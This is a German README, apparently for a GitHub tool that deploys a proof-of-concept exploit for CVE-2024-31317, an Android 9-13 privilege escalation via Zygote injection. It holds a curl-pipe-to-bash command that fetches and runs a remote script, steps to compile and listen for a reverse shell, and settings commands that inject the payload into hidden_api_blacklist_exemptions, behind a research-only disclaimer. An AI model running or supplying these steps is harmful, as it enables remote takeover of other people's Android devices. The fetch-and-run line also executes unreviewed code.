
Automatisiertes Deployment-Tool für den CVE-2024-31317-PoC auf Android 9-13, das eine Privilegieneskalation durch Zygote-Injektion und Reverse-Shell-Ausführung ermöglicht.
Ein Bereitstellungstool für den Proof-of-Concept-Exploit CVE-2024-31317, der auf Android-Geräte von Version 9 bis 13 abzielt.
CVE-2024-31317-PoC-Deployer ist ein automatisiertes Bereitstellungsskript, das schnell alle für die Ausnutzung von CVE-2024-31317 erforderlichen Dateien generiert und konfiguriert. Die Schwachstelle betrifft Android-Geräte der Versionen 9 bis 13 und ermöglicht eine Rechteausweitung und Ausführung beliebigen Codes über den Zygote-Prozess.
reverse_shell.c – Reverse-Shell-Programm in Cpayload.txt – Speziell konstruiertes Exploit-Payloadcompile.sh – Automatisches KompilierungsskriptREADME.txt – Detaillierte BenutzungsanleitungCVE-2024-31317.txt – Technische Analyse der SchwachstelleFühren Sie das Bereitstellungsskript aus:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Reverse-Shell kompilieren:
sh compile.sh
Reverse-Shell-Listener starten:
sh reverse_shell
payload.txt auf das Zielgerät unter /data/local/tmp/ hoch.xxx.xxx.xxx in payload.txt durch die IP-Adresse Ihres Listener-Servers.am force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Dieses Tool dient ausschließlich zu legitimen Sicherheitstest- und Forschungszwecken. Vor der Verwendung muss eine ausdrückliche Genehmigung des Zielsystems eingeholt werden. Eine unbefugte Nutzung kann gegen geltendes Recht verstoßen. Der Entwickler übernimmt keine Verantwortung für Missbrauch.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.